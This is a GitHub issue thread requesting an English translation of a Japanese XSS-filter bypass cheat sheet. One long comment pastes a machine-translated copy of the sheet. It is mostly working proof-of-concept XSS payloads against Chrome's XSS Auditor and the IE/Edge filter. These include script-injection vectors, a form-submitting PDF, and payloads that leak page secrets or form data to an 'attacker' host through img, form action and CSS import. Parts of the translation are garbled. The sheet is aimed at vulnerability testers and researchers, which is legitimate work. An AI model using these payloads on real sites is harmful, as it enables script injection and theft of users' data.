Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

English version? #2

Open
qazbnm456 opened this issue Sep 14, 2017 · 8 comments
Open

English version? #2

qazbnm456 opened this issue Sep 14, 2017 · 8 comments

Comments

@qazbnm456
Copy link

Hi @masatokinugawa, thanks for your sharing. It's pretty neat! However, I just want to know do you have any plan offering the English version as well? It would be great if we can have one. 😄
@masatokinugawa
Copy link
Owner

Hi @qazbnm456! I am thinking that I want to provide English version, but I couldn't make time so far :(

Hi @Auxy233! Please feel free to translate my cheatsheet. It's up to you, but if you can send me the English version (via the pull request?), I'll merge it and add proper credit. Thanks!

@qazbnm456
Copy link
Author

Thank you for your consideration and help, @masatokinugawa and @Auxy233. I'm looking forward to it. 😄

@qazbnm456
Copy link
Author

@Auxy233 Nice, I can't wait to see it. Really appreciate. 👍

@qazbnm456
Copy link
Author

@Auxy233 Sorry for bothering again, but is there any progress I can follow up? Still awaiting your kind work patiently.

@jcubic
Copy link

jcubic commented Jan 12, 2018

Any progress?

@EdOverflow
Copy link

Just use Google Translate for the time being. @masatokinugawa does a good job at describing the conditions and I was easily able to reproduce the bypasses.

@w1redch4d
Copy link

w1redch4d commented Jan 10, 2023
edited
Loading

here is an google translated markdown for yall, who needs it :

This page summarizes XSS Auditor and XSS filter bypass. Content that runs on the latest versions of Chrome/Safari and IE11/Edge is eligible.
If you're a vulnerability diagnostician, let us help you convincingly prove that an attack is possible, and if you're a security researcher, help us find more bypasses.
What I'm listing is what can be bypassed in common situations. Just because a method isn't listed here doesn't mean it can't be abused in real-world situations. Regardless of whether it can be bypassed or not, it's always a good idea to do some underlying XSS mitigation.

Table of contents

Table of contents

XSS Auditor

What is not blocked

In contexts where protection is not provided in the first place, scripts can be executed without special manipulation.

XSS happening in string literals

https://vulnerabledoma.in/bypass/str_literal?q=%22%3Balert(1)//

<script>var q="";alert(1)//"</script>

XSS established by URL alone (such as when the input value is directly entered in the href part of the a tag)

https://vulnerabledoma.in/bypass/link?q=javascript:alert(1)

<a href="javascript:alert(1)">Link</a>

If you have more than one injection point

(Although it appears to be able to screen out a significant number of cases occurring with more than one, previously reported cases ( [#96616](https://bugs.chromium.org/p/chromium/issues/detail?id =96616) #403636 ) is WontFix, so it is classified as not to be blocked.)

https://vulnerabledoma.in/bypass/text?type=2&q=%60-alert(1)%3C/script%3E%3Cscript%3E%60

<div>`-alert(1)</script><script>`</div>
<div>`-alert(1)</script><script>`</div>

If there is string manipulation

When some strings are removed or replaced, intervening strings do not block.

If deleted

https://vulnerabledoma.in/bypass/text?type=6&q=%3Csvg%20o%3Cscript%3Enload=alert(1)%3E

<svg o<script>nload=alert(1)>
↓
<svg onload=alert(1)>

if replaced

https://vulnerabledoma.in/bypass/text?type=7&q=%3Cscript%3E/%26/-alert(1)%3C/script%3E

<script>/&/-alert(1)</script><script>/&amp;/-alert(1)</script>

DOM based XSS other than document.write() the request string

https://vulnerabledoma.in/bypass/dom_innerhtml#%3Cimg%20src=x%20onerror=alert(1)%3E

<body>
<script>
hash=location.hash.slice(1);
document.body.innerHTML=decodeURIComponent(hash);
</script>
</body>

https://vulnerabledoma.in/bypass/dom_redirect#javascript:alert(1)

<script>
location.href=decodeURIComponent(location.hash.slice(1));
</script>

XSS in XML pages

https://vulnerabledoma.in/bypass/xml?q=%3Cscript%20xmlns=%22http://www.w3.org/1999/xhtml%22%3Ealert(1)%3C/script%3E

<?xml version="1.0"?><html><script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script></html>

Bypass also occurs when a string can be written from the top of the page, Content-Type is not specified correctly, and XML is selected by Content Sniffing.

https://vulnerabledoma.in/bypass/text?mime=unknown&q=%3C?xml%20version=%221.0%22?%3E%3Cscript%20xmlns=%22http://www.w3.org/1999/xhtml% 22%3Ealert(1)%3C/script%3E

<?xml version="1.0"?><script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>

Anything less than this does not lead to script execution, but is allowed to be written and has the potential to be used for attacks to some extent.

http(s): create link

https://vulnerabledoma.in/bypass/text?q=%3Ca%20href=https://attacker/%3ESession%20expired.%20Please%20login%20again.%3C/a%3E

<a href=https://attacker/>Session expired. Please login again.</a>

Tags that can send requests to the outside

It is sometimes possible to include confidential information in requests such as images, for example by using open quotes.

https://vulnerabledoma.in/bypass/text?type=8&q=%3Cimg%20src=%22https://attacker/?data=

<p><img src="https://attacker/?data=</p>
<p>This is a secret text.</p>
<p id="x">AAA</p>

Arbitrary CSS description

In addition to disguising the appearance of the page, if the same page contains sensitive information, it may be possible to retrieve the information using only CSS. See URL for details.

Reference URL:

https://vulnerabledoma.in/bypass/text?q=%3Cstyle%3E@import%20%27//attacker/test.css%27%3C/style%3E

<style>@import '//attacker/test.css'</style>

https://vulnerabledoma.in/bypass/text?q=%3Clink%20rel=stylesheet%20href=//attacker/test.css%3E

<link rel=stylesheet href=//attacker/test.css>

Bypass

Using the values attribute for SVG animations (Safari only)

Conditions for attacking:

  1. There is XSS that can write arbitrary tags

Reference URL:

PoCs:

https://vulnerabledoma.in/bypass/text?q=%3Csvg%20xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Canimate%20xlink:href=%23x%20attributeName=%22xlink :href%22%20values=%22%26%23x3000%3Bjavascript:alert(1)%22%20/%3E%3Ca%20id=x%3E%3Crect%20width=100%20height=100%20/%3E %3C/a%3E

<svg xmlns:xlink=http://www.w3.org/1999/xlink><animate xlink:href=#x attributeName="xlink:href" values="&#x3000;javascript:alert(1)"/ ><a id=x><rect width=100 height=100 /></a>

Using multiple null characters (Safari only)

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. A null byte is printed
  3. No preceding whitespace character

Reference URL:

PoCs:

https://vulnerabledoma.in/bypass/text?q=%00%00%00%00%00%00%00%3Cscript%3Ealert(1)%3C/script%3E

[0x00][0x00][0x00][0x00][0x00][0x00][0x00]<script>alert(1)</script>

Using comments with --> in script tags (Safari only)

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. There is a closing tag of the script tag without a line break after it

Reference URL:

PoCs:

https://vulnerabledoma.in/bypass/text?type=9&q=%3Cscript%3Ealert(1)%0A--%3E

<div><script>alert(1)
--></div><script src=/test.js></script>

Using half-baked base tags (Safari only)

Using Flash

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. There is no space immediately after or '" after it
  3. Flash can be used in the target environment

Reference URL:

PoCs:

(if there is no space immediately after) https://vulnerabledoma.in/bypass/text?type=3&q=%3Cembed%20allowscriptaccess=always%20src=/xss.swf%3E%3Cbase%20href=//l0.cm /

<div><embed allowscriptaccess=always src=/xss.swf><base href=//l0.cm/</div>

(If there is a white space immediately after) https://vulnerabledoma.in/bypass/text?type=4&q=%3Cembed%20allowscriptaccess=always%20src=/xss.swf%3E%3Cbase%20href=%22//l0 .cm/

<div> <embed allowscriptaccess=always src=/xss.swf><base href="//l0.cm/ </div><div id="x"></div>

Using scripts loaded with relative URLs

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. There is no space immediately after or '" after it
  3. After that, there is a part that loads the script with a relative URL

PoCs:

https://vulnerabledoma.in/bypass/text?type=9&q=%3Cbase%20href=//cors.l0.cm/

<div><base href=//cors.l0.cm/</div><script src=/test.js></script>

Use of ISO-2022-JP escape sequences

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. There is no character code specification on the page

supplement:

In the ISO-2022-JP HTML, the byte strings [0x1B](B, [0x1B](H, [0x1B](J are ignored. Insert this between the reaction strings Also, in Chrome/Safari, a byte string such as [0x1B]$@[0x0A] is treated the same as [0x0A], but the XSS Auditor cannot interpret it well and bypasses it.

Reference URL:

PoCs:

<meta charset=iso-2022-jp><svg o[0x1B](Bnload=alert(1)>

(*Because the $ sign is arbitrarily encoded and does not work as intended, the redirect is sandwiched by a method that includes a $.)

<meta charset=iso-2022-jp><script>alert(1)[0x1B]$@[0x0A]</script>

Using resources from the same domain

XSS Auditor does not block loading same-domain resources that do not have queries. Bypassing is possible in some cases if the resources necessary for an attack can be placed in the same domain.

Cases with XSS in the path (Chrome only)

Conditions for attacking:

  1. XSS that can write arbitrary tags is in the path
  2. Doesn't require a query to display the page

PoCs:

https://vulnerabledoma.in/bypass/path/%3Clink%20rel=import%20href=%22%2Fbypass%2Fpath%2F%3Cscript%3Ealert(1)%3C%2Fscript%3E%22%3E

PATH_INFO:/<link rel=import href="/bypass/path/<script>alert(1)</script>">

File Upload Feature

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. Hosting user-uploaded files on the same origin

PoCs:

https://vulnerabledoma.in/bypass/text?q=%3Cscript%20src=/bypass/usercontent/xss.js%3E%3C/script%3E

<script src=/bypass/usercontent/xss.js></script>

(Chrome only)
https://vulnerabledoma.in/bypass/text?q=%3Clink%20rel=import%20href=/bypass/usercontent/icon.jpg%3E

<link rel=import href=/bypass/usercontent/icon.jpg>

Using Flash and flashvars

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. There is Flash in the same origin that passes an unescaped parameter string to ExnternalInterface.call()
  3. Flash can be used in the target environment

supplement:

By using the flashvars attribute, you can pass parameters without having to pass Flash parameters directly to the query. (= On the Flash side, even if passing parameters from the URL is restricted as a countermeasure against XSS by opening Flash directly, it can be passed with flashvars.) In addition, `Content-Security-Policy: default-src It can also be used to bypass CSP, such as when there is a CSP like 'self'.

PoCs:

https://vulnerabledoma.in/bypass/text?csp=self&q=%3Cembed%20name=a%20flashvars=%27autoplay=true%26file=%22})\%22)-(alert=alert(1)))}catch(e){}//%27%20allowscriptaccess=always%20src=//vulnerabledoma.in/bypass/wp-includes/js/mediaelement/flashmediaelement.swf%3E

<embed name=a flashvars='autoplay=true&file="})\")-(alert=alert(1)))}catch(e){}//' allowscriptaccess=always src=//vulnerabledoma.in/bypass /wp-includes/js/mediaelement/flashmediaelement.swf>

ActionScript:

ExternalInterface.call("setTimeout", ExternalInterface.objectID + '_event' + "('" + eventName + "'," + eventValues + ")", 0);

Using ExternalInterface.objectID and ExternalInterface.call() in Flash

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. There is Flash in the same origin where ExternalInterface.objectID is passed to ExternalInterface.call()
  3. Flash can be used in the target environment

supplement:

ExternalInterface.objectID is a property that sets the value of the name attribute of the tag used for embedding, and although it cannot be XSSed by itself, it can be used only for bypassing. It can also be used to bypass CSP when there are CSP restrictions such as Content-Security-Policy: default-src 'self'.

PoCs:

https://vulnerabledoma.in/bypass/text?csp=self&q=%3Cembed%20name=%27alert(1)-%27%20allowscriptaccess=always%20src=//vulnerabledoma.in/bypass/wp-includes/js/ mediaelement/flashmediaelement.swf%3E

<embed name='alert(1)-' allowscriptaccess=always src=//vulnerabledoma.in/bypass/wp-includes/js/mediaelement/flashmediaelement.swf>

ActionScript:

ExternalInterface.call(ExternalInterface.objectID + '_init');

Using Angular

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. A page on the same origin that hosts Angular or loads Angular from a CORS-enabled CDN

supplement:

Angular will try to expand the template enclosed in {{}} inside the tag with the attribute ng-app. Templates can run scripts.

Reference URL:

PoCs:

https://vulnerabledoma.in/bypass/text?q=%3Cscript%20src=%22/js/angular1.6.4.min.js%22%3E%3C/script%3E%3Cp%20ng-app%3E{ {constructor.constructor(%27alert(1)%27)()}}

<script src="/js/angular1.6.4.min.js"></script><p ng-app>{{constructor.constructor('alert(1)')()}}

If you have a page on the same origin that loads Angular from a CORS-enabled CDN, you can load resources from external origins by indirectly loading them from HTML Imports.

(Chrome only) https://vulnerabledoma.in/bypass/text?q=%3Clink%20rel=import%20href=angular.html%3E%3Cp%20ng-app%3E{{constructor.constructor(%27alert(1) )%27)()}}

<link rel=import href=angular.html><p ng-app>{{constructor.constructor('alert(1)')()}}

Using Vue.js

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. A page on the same origin that hosts Vue.js or loads from a CORS-enabled CDN
  3. There is a script on the page or on the same origin that can execute template expansion for specially crafted tags

PoCs:

(This example is for Chrome only) https://vulnerabledoma.in/bypass/text?q=%3Clink%20rel=import%20href=/bypass/vue.html%3E%3Cdiv%20id=app%3E{{constructor. constructor(%27alert(1)%27)()}}

<link rel=import href=/bypass/vue.html><div id=app>{{constructor.constructor('alert(1)')()}}

Using jQuery

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. A page on the same origin that hosts jQuery or loads jQuery from a CORS-enabled CDN
  3. There is a script on the page or on the same origin that can execute jQuery additional functions for the crafted form tag

supplement:

jQuery additional functions are after,before,prepend,append,html,replaceWith,wrap,wrapAll,insertBefore,insertAfter,prependTo Things like ,appendTo. By using a form component with a name attribute of ownerDocument, the reference destination of Node.ownerDocument is misleading. , the script is executed when it should not be executed. -scream/21)). In addition, there is a process to remove <!-- in the script block before execution, combined with the fact that Auditor does not intercept script blocks that contain only comments, causes the bypass.

Reference URL:

PoCs:

https://vulnerabledoma.in/bypass/text?type=5&q=%3Cform%20class=child%3E%3Cinput%20name=ownerDocument%3E%3Cscript%3E%3C!--alert(1)%3C/script% 3E%3C/form%3E

<!DOCTYPE html>
<html>
<head>
<script src="/js/jquery-3.2.1.min.js"></script>
<script>
$(document).ready(function(){
     // code taken from http://api.jquery.com/after/
     $( ".container" ).after( $( ".child" ) );
});
</script>
</head>
<body>
<!-- XSS -->
<form class=child><input name=ownerDocument><script><!--alert(1)</script></form>
<!-- XSS -->
<p class="container"></p>
</body>
<!-- Inspired by @sirdarckcat CSP bypass trick: https://sirdarckcat.github.io/csp/jquery.html -->
</html>

(This example is Chrome only) https://vulnerabledoma.in/bypass/text?q=%3Clink%20rel=import%20href=/bypass/jquery.html%3E%3Cp%20class=container%3E%3C/p %3E%3Cform%20class=child%3E%3Cinput%20name=ownerDocument%3E%3Cscript%3E%3C!--alert(1)%3C/script%3E%3C/form%3E

<link rel=import href=/bypass/jquery.html><p class=container></p><form class=child><input name=ownerDocument><script><!--alert(1)</script ></form>

Using underscore.js

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. A page on the same origin that hosts underscore.js or loads it from a CORS-enabled CDN
  3. There is a script on the page or on the same origin that can execute template expansion for specially crafted script tags

PoCs:

(This example is for Chrome only) https://vulnerabledoma.in/bypass/text?q=%3Clink%20rel=import%20href=/bypass/underscore.html%3E%3Cscript%20id=template%3E//%3C %alert1%%3E%3C/script%3E

<link rel=import href=/bypass/underscore.html><script id=template>//<%alert`1`%></script>

Using JSX transformation scripts such as JSXTransformer/babel-standalone

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. Pages on the same origin that host JSX transformation scripts such as JSXTransformer.js or load them from a CORS-enabled CDN

supplement:

Take advantage of the conversion script parsing SVG script blocks in the same way as HTML script blocks. The comment part between <!-- and -->, which is not normally executed, is evaluated as a script.

PoCs:

(This example is for Chrome only) https://vulnerabledoma.in/bypass/text?charset=utf-8&type=1&q=%3Clink%20rel=import%20href=/bypass/babel-standalone.html%3E%3Csvg%3E %3Cscript%20type=%22text/jsx%22%3E//%3C!--%0aalert(1)//--%3E%3C/svg%3E%3Cscript%3E0%3C/script%3E

<link rel=import href=/bypass/babel-standalone.html><svg><script type=text/jsx>//<!--
alert(1)//--></svg><script>0</script>

Use odd tags when document.write() (Chrome only)

Conditions for attacking:

  1. There is XSS that document.write() the URL
  2. The tag used for the attack can be closed outside document.write() (in the case of the PoC below, </body> is used as the closing tag)

Reference URL:

PoCs:

https://vulnerabledoma.in/bypass/dom_docwrite#%3Cimg%20src=x%20onerror=alert(1)//

<body>
<script>
hash=location.hash.slice(1);
document.write(decodeURIComponent(hash));
</script>
</body>

Using half-baked form tags (getting information only) (Safari only)

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. New form tags can be placed where existing form content containing sensitive information can be submitted.

Reference URL:

PoCs:

(if you are inside a form) https://vulnerabledoma.in/bypass/form?q=%22%3E%3C/form%3E%3Cform%20action=https://attacker/

<form action="form">
<input type="hidden" name="q" value=""></form><form action=https://attacker/">
<input type="hidden" name="secret" value="a09d3ef0">
<input type="submit">
</form>

(when outside the form) https://vulnerabledoma.in/bypass/form2?q=%3Cbutton%20form=f%3ECLICK%3Cform%20id=f%20action=https://attacker/

<div><button form=f>CLICK<form id=f action=https://attacker/</div>
<form action="form2">
<input type="hidden" name="secret" value="a09d3ef0">
</form>

past bypass

Posted in Fixed Bypass Archive.

IE/Edge XSS filter

What is not blocked

XSS happening in string literals

supplement:

Previously there was a blocking condition for string literals. Although it still partially remains, assignment to location, which was blocked before, is clearly attackable, etc. is allowed, and there is almost no protection. It doesn't look like it's going to provide protection any more, so I've categorized it as non-blocking rather than bypass.

https://vulnerabledoma.in/bypass/str_literal?q=%22%3Blocation='javascript\x3Aalert\x281\x29'//

<script>var q="";location='javascript\x3Aalert\x281\x29'//"</script>

All DOM based XSS

https://vulnerabledoma.in/bypass/dom_docwrite#%3Cimg%20src=x%20onerror=alert(1)%3E

<script>
hash=location.hash.slice(1);
document.write(decodeURIComponent(hash));
</script>

https://vulnerabledoma.in/bypass/dom_innerhtml#%3Cimg%20src=x%20onerror=alert(1)%3E

<body>
<script>
hash=location.hash.slice(1);
document.body.innerHTML=decodeURIComponent(hash);
</script>
</body>

https://vulnerabledoma.in/bypass/dom_redirect#javascript:alert(1)

<script>
location.href=decodeURIComponent(location.hash.slice(1));
</script>

XSS with more than one injection point on one page

https://vulnerabledoma.in/bypass/text?type=2&q=%22src=data:,alert%25281%2529%3E%3C/script%3E%3Cscript%20x=%22

<div>"src=data:,alert%281%29></script><script x="</div>
<div>"src=data:,alert%281%29></script><script x="</div>

If there is string manipulation

When some strings are removed or replaced, intervening strings do not block.

If deleted

https://vulnerabledoma.in/bypass/text?type=6&q=%3Csvg%20o%3Cscript%3Enload=alert(1)%3E

<svg o<script>nload=alert(1)>
↓
<svg onload=alert(1)>

if replaced

At the position represented by . in the regular expression of the filter, more than Can no longer be blocked if a replacement is made.

In the following case, to avoid matching the cut-off condition <sc{r}ipt.*?>, the behavior of & being replaced excessively is used. / is a wildcard of 0-3 characters and & is a wildcard of 0-5 characters, so the maximum width that can be cut off is 8 characters. The string length of /&amp;amp; in the output after replacement is 10 characters, which exceeds the width of 8 characters, so it cannot be cut off.

PoCs:

https://vulnerabledoma.in/bypass/text?type=10&q=%3Cscript/%26%3Ealert(1)%3C/script%3E

<script/&>alert(1)</script><script/&amp;amp;>alert(1)</script>

Anything less than this does not lead to script execution, but is allowed to be written and has the potential to be used for attacks to some extent.

Tags that can send requests to the outside

It is sometimes possible to include confidential information in requests such as images, for example by using open quotes.

https://vulnerabledoma.in/bypass/text?type=8&q=%3Cimg%20src=%22https://attacker/?data=

<p><img src="https://attacker/?data=</p>
<p>This is a secret text.</p>
<p id="x">AAA</p>

Bypass

Using strings disguised as XML namespaces (Edge only)

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. Flash is enabled in the target environment
  3. No X-XSS-Protection:1; mode-block header

supplement:

Edge will also try to block tags with an XML namespace. If a character string such as <embed/:script is used in normal HTML, it will be interpreted as a script tag when it should be interpreted as an embed tag, and blocking will fail. Since the blocking action has happened, the bypass will fail if the X-XSS-Protection:1; mode-block header is present.

Reference URL:

PoCs:

https://vulnerabledoma.in/bypass/text?q=%3Cembed/:script%20allowscriptaccess=always%20src=//l0.cm/xss.swf%3E

<embed/:script allowscriptaccess=always src=//l0.cm/xss.swf>

Using HZ-GB-2312 Escape Sequences

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. Missing character code specification in Content-Type header

Reference URL:

PoCs:

https://vulnerabledoma.in/bypass/text?q=%3Cx~%0Aonfocus=alert%281%29%20id=a%20tabindex=0%3E#a

<x~
onfocus=alert(1) id=a tabindex=0>

Using encoding behavior when navigating

Conditions for attacking:

  1. Reflected XSS via GET

supplement:

During navigation, IE/Edge encodes the query string with the character code of the page before navigation and sends the request. At this time, the XSS filter was (presumably) checking the encoded string itself, not the request being sent, which could cause a mismatch between the encoded string and the bytes actually sent. Bypass occurs when

A specific example is shown with the character code x-chinese-cns used in the PoC below. In x-chinese-cns the character is mapped to 0xA13E. At this time, a query <script/旡 containing this string is sent from a page that has x-chinese-cns set as the character code of the page, attached to a parameter with reflective XSS. Then, the request to be sent is not the UTF-8 representation of , but the byte itself encoded in x-chinese-cns </script/0xA1> (0x3E is >). , a <script> tag is written in the page. Normally, if you write a <script> tag, the XSS filter should work, but it doesn't work here. The reason for this is presumed that the filter mistakenly saw the string <script/旡 and did not match the blocking condition <sc{r}ipt.*?>.

Reference URL:

PoCs:

<meta charset=utf-8>
<script>
   document.charset="x-chinese-cns";
   location="https://vulnerabledoma.in/bypass/text?q=<script/旡alert(1)<\/script/"
</script>

(For XSS with attribute value only) https://l0.cm/bypass/ie_x-chinese-cns_attribute.html

<meta charset=utf-8>
<script>
   document.charset="x-chinese-cns";
   location="https://vulnerabledoma.in/bypass/attribute?q=乜onmouseover=alert(1)//"
</script>

As with other character codes, a mismatch between the encoded string and the bytes actually sent can be bypassed.

(The following is reproduced in an environment where the system locale is Japanese, but it was not reproduced in an environment with a German language. It seems that the operating principle is slightly different from other vectors, but I do not know the clear principle.For reference published in.)

Using the Adobe Acrobat Reader plug-in (IE only)

Conditions for attacking:

  1. There is XSS via POST request
  2. Target uses Adobe Acrobat Reader plugin

Reference URL:

PoCs:

https://l0.cm/bypass/ie_postxss_bypass.pdf

%PDF-1.1
1 0 obj
<<
/Type /Catalog
/Outlines 20R
/Pages 3 0R
/Open Action 33 0 R
/AcroForm 220R
>>
endobj
2 0 obj
<<
/Type /Outlines
/Count 0
>>
endobj
3 0 obj
<<
/Type /Pages
/Kids [4 0 R]
/Count 1
>>
endobj
4 0 obj
<<
/Type /Page
/Annot [230R]
/Parent 3 0 R
/MediaBox [0 0 612 792]
/Contents 5 0 R
/Resources <<
/ProcSet [/PDF /Text]
/Font << /F1 6 0 R >>
>>
>>
endobj
5 0 obj
<< /Length 56 >>
streams
BT /F1 12 Tf 100 700 Td 15 TL (JavaScript example) Tj ET
endstream
endobj
6 0 obj
<<
/Type /Font
/Subtype /Type1
/Name /F1
/BaseFont /Helvetica
/Encoding /MacRomanEncoding
>>
endobj

33 0 obj
<<
/S /SubmitForm
/F
         <<
         %URL TO SUBMIT TO:
         /F (https://vulnerabledoma.in/bypass/text)
         /FS /URL
         >>
% SPECIFIES THE FORMAT AND OTHER FORM RELATED CONFIGURATION
/Flags 6
>>
endobj

22 0 obj
<<
     /Fields[23 0R]
>>
endobj
23 0 obj
<<
     /DA (/Helv 12 Tf 0g)
     /F4
     /FT /Tx
     /Rect [ 9.526760 680.078003 297.527008 702.078003 ]
     /Subtype /Widget
     /Type /Annot
     % PARAMETER NAME
     /T (q)
     % PARAMETER PAYLOAD
     /V (<script>alert\(1\)</script>)
     /P40R
>>
endobj
trailer
<<
/Root 1 0 R
>>

Using Content Sniffing for XML (IE only)

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. Missing X-Content-Type-Options:nosniff
  3. String from top of page

Reference URL:

PoCs:

https://vulnerabledoma.in/bypass/text?q=%3C?xml%20version=%221.0%22?%3E%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/ xhtml%22%3Ealert%281%26%23x29%3B%3C/x:script%3E

<?xml version="1.0"?><x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(1&#x29;</x:script>

Using UTF-7 BOM (IE only)

Conditions for attacking:

  1. Character strings can be written from the top of the page
  2. Symbols such as +, /, and - are allowed

supplement:

+/v8, +/v9, +/v+, +/v/ are UTF-7 [BOM](https://ja.wikipedia.org/wiki/%E3%83% 90%E3%82%A4%E3%83%88%E3%82%AA%E3%83%BC%E3%83%80%E3%83%BC%E3%83%9E%E3%83%BC% E3%82%AF). In IE, if this string appears at the top of the page, the character code of the page is assumed to be UTF-7.
Even if the character code is specified in the page, if the page is reopened via history.back(), the character code of that page will be treated as UTF-7. (Although the latter behavior was reported to Microsoft in July 2013, no changes have been made to date.)

PoCs:

(If there is no character code specified on the page) https://vulnerabledoma.in/bypass/text?q=%2B/v8-%2BADw-script%2BAD4-alert(1)%2BADw-/script%2BAD4-

+/v8-+ADw-script+AD4-alert(1)+ADw-/script+AD4-

(If the page has character code specification) https://l0.cm/bypass/ie_utf7.html

<script>
function go(){
   window.open("https://vulnerabledoma.in/bypass/text?q=%2B/v8-%2BADw-script%2BAD4-alert(location)%2BADw-/script%2BAD4-&charset=utf-8", "a");
   setTimeout(function(){window.open("https://l0.cm/h_back.html","a")},1000);
}
</script>
<button onclick=go()>go</button>

Using <?PXML> (IE only)

Conditions for attacking:

  1. Reflected XSS
  2. Three or more < do not appear before the injection point
  3. The document mode of the page is set to 9 or less, or you can set the document mode to 9 or less by embedding in a frame, etc.

Reference URL:

PoCs:

https://vulnerabledoma.in/bypass/text?q=%3C?PXML%3E%3Chtml:script%3Ealert(1)%3C/html:script%3E&xuac=9

<?PXML><html:script>alert(1)</html:script>

https://vulnerabledoma.in/bypass/text?q=%3CPXML%3E%3Chtml:script%3Ealert(1)%3C/html:script%3E&xuac=9

<PXML><html:script>alert(1)</html:script>

Using referrers

IE/Edge's XSS filter does not work in cases with a Referer header from the same domain (including subdomains) or localhost. Bypassing is possible if such a referrer can be attached.

Use of link functions within the same domain (including subdomains)

Conditions for attacking:

  1. Reflected XSS
  2. Create links to XSS pages on the same domain (including subdomains)

PoCs:

<a href="https://vulnerabledoma.in/bypass/text?q=<script>alert(1)</script>">Click HERE</a>

Bypass where arbitrary URL can be specified

Conditions for attacking:

  1. There are places where reflective XSS is possible in the link

supplement:

By double linking the vulnerable part and adding a referrer, you can create a link to a javascript: URL without triggering the XSS filter.

PoCs:

https://vulnerabledoma.in/bypass/link?q=?q=javascript%253Aalert(1)

<a href="?q=javascript%3Aalert(1)">Link</a>

If the state before submission to the vulnerable form can be maintained on the page

Conditions for attacking:

  1. Reflected XSS
  2. The state before submission to the vulnerable form can be maintained on the page of the same domain (including subdomains).

PoCs:

https://vulnerabledoma.in/bypass/form?q=%26%23x22%3B%3E%26%23x3C%3Bscript%3Ealert%26%23x28%3B1)%26%23x3C%3B/script%3E

<form action="form">
<input type="hidden" name="q" value="&#x22;>&#x3C;script>alert&#x28;1)&#x3C;/script>">
<input type="hidden" name="secret" value="a09d3ef0">
<input type="submit">
</form>

Using option tags

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. The XSS is inside an existing form

Reference URL:

PoCs:

https://vulnerabledoma.in/bypass/form3?q=%3Cbutton%20formaction=form3%3ECLICK%3Cselect%20name=q%3E%3Coption%3E%26lt%3Bscript%3Ealert(1)%26lt%3B/script%3E

<form action=submit>
<button formaction=form3>CLICK<select name=q><option>&lt;script>alert(1)&lt;/script>
</form>

Using an empty iframe

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. The page allows embedding in frames

supplement:

Creating an empty iframe with XSS and navigating a scripted URL to that frame causes a bypass due to the referrer of the vulnerable domain itself.

Reference URL:

PoCs:

https://l0.cm/bypass/ieedge_iframe.html

<!-- Found by @magicmac2000 -->
<iframe onload="contentWindow[0].location='//vulnerabledoma.in/bypass/text?q=<script>alert(location)</script>'" src="//vulnerabledoma.in/bypass/text ?q=%3Ciframe%3E"></iframe>

Using formaction (getting information only)

Conditions for attacking:

  1. Reflected XSS
  2. You can write a new formaction attribute where you can submit an existing form content containing sensitive information.

PoCs:

https://vulnerabledoma.in/bypass/form?q=%22%3E%3Cbutton%20formaction=//attacker/%3E

<form action="form">
<input type="hidden" name="q" value=""><button formaction=//attacker/>">
<input type="hidden" name="secret" value="a09d3ef0">
<input type="submit">
</form>

Use of character-referenced strings in style (style description only)

Conditions for attacking:

  1. Reflected XSS
  2. Attackable with CSS

supplement:

Entity reference notation such as @, :, \,( that are part of the reaction string is not considered, so style blocks and attributes in SVG where entity reference notation is allowed Bypass occurs in value.
In IE, not only attacks that read information with CSS, but in some cases scripts can be executed via behavior:url().

Reference URL:

PoCs:

https://vulnerabledoma.in/bypass/text?q=%3Csvg%3E%3Cstyle%3E%26commat%3Bimport'//attacker'%3C/style%3E

<svg><style>&commat;import'//attacker'</style>

https://vulnerabledoma.in/bypass/text?q=%3Csvg%3E%3Cstyle%3E@%26bsol%3B0069mport%27//attacker%27%3C/style%3E

<svg><style>@&bsol;0069mport'//attacker'</style>

(IE+IE10 mode only) https://vulnerabledoma.in/bypass/text?q=%3Cp%20style="behavior%26colon%3Burl('/bypass/usercontent/xss.txt')"%3Etest&xuac=10

<p style="behavior&colon;url('/bypass/usercontent/xss.txt')">

(IE+IE10 mode only) https://vulnerabledoma.in/bypass/text?q=%3Cp%20style="behavior:url%26lpar%3B'/bypass/usercontent/xss.txt')"%3Etest&xuac=10

<p style="behavior:url&lpar;'/bypass/usercontent/xss.txt')">

Past bypass

Published on Fixed Bypass Archive.

@jcubic
Copy link

jcubic commented Jan 10, 2023

@w1redch4d I don't think that adding it as a comment to an issue is really helpful. But thanks for the effort anyway. I hope that it will help those that don't know what Google Translate is and how to use it.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
5 participants
@jcubic @masatokinugawa @qazbnm456 @EdOverflow @w1redch4d